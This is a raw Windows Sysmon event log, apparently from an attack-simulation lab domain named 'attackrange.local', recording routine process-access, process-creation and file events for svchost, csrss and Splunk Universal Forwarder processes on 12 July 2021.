07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:25.015{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.000{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.874{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53B21CDF86BAF1930A422EE1EC2EB73D,SHA256=92094C469C91C49D999490A4089B65B6B4A8DE80FCAC248AE8A9046F24BDEAC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:26.075{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39A293850A8094C1FB88F163A8E1BC8,SHA256=98603BA0DE06EC7C1F5570F839A63AEE992799362346642CA150C4B0EC5E25F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.811{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF2C193B54D23136B2175C63B854107B,SHA256=1789E6722C019973E89EF0C8DF785AE4458F4A804975ACD284908DE837F55C42,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000808870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.327{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.312{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:27.077{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=149BE6F19FCE1285D473D037E172FB8E,SHA256=A69271DF7B5BC214A643A6540C1193D587E99FC2A08795D1F774DC87240DDAC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.827{0C1E0330-F65F-60EB-A979-00000000D001}2372292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
